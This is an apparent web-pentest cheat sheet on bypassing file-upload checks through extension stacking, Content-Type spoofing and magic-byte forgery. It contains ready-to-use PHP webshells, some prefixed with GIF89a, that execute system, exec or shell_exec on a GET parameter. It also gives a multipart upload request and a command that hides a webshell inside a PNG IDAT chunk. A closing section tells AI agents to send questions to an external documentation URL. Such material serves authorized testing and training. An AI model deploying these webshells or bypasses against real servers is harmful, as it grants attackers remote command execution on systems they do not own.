# File Upload Tricks

When uploading files , check for validation on :

1. **File extension**

   * Server side extension allowed ? :

   ```
   php
   phtml
   php4
   ```

   * Stacking / Double Extension

   ```
   .php.png
   .%20.php
   ```

Using gif (shell.php)

```
GIF89a;
<?php
system($_GET['cmd']);
?>
```

Advanced gif&#x20;

```http
Content-Disposition: form-data; name="upload"; filename="web.php"
Content-Type: image/png

GIF89a;
<?php
system($_GET['cmd']);
?>
```

2. **Content-Type header**

* Is server extension like php able to bypass the upload restriction ?

&#x20;     \- If yes , just change content-type header to like image and it will still run as php.

* Does the server validate content-type header like disallow application/json?

3. **Magic bytes (file hex value)**

* Does the server check **file signature** ?
* If no , can change file signature using `hexedit`

### PHP Function Exploit

`imagecopyresampled` `imagecreatefromstring`

<figure><img src="/files/6zLYORo39GzwjMidGYGi" alt=""><figcaption></figcaption></figure>

solution :Hide the webshell in the IDAT chunk of PNG

```http
https://github.com/huntergregal/PNG-IDAT-Payload-Generator/tree/master
```

```bash
python3 generate.py -m php -o webshell.png
```

Rename to `webshell.png.php`

#### Shell exec

php

```php
shell_exec() , exec() , system()
```

Examples

```php
<?php echo shell_exec($_GET['command']); ?>
<?php echo exec($_GET['command']); ?>
<?php echo system($_GET['command']); ?>
```

```php
<?php echo exec($_GET['e'].' 2>&1'); ?>
<?php system($_GET['e'].' 2>&1'); ?>
<?php echo shell_exec($_GET['e'].' 2>&1'); ?>
```

### Content-Types of Common Files

#### Pictures :

```
image/png
image/jpeg
image/gif
```

#### JSON :

```
application/json
```

#### PHP :

```
application/x-php
application/x-www-form-urlencoded
multipart/form-data
application/octet-stream
```

#### TXT :

```
text/plain
```

#### XML :

```
application/xml  
text/xml
```

#### HTML :

```
text/html
```

#### JAVASCRIPT :

```
text/javascript
application/javascript
```

#### PDF

```
application/pdf
```

#### AUDIO

```
audio/mpeg
audio/wav
```

#### VIDEO

```
video/mp4
video/quicktime
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://jackmeister.gitbook.io/jackmeister-playbook/web-pentest/file-upload-tricks.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.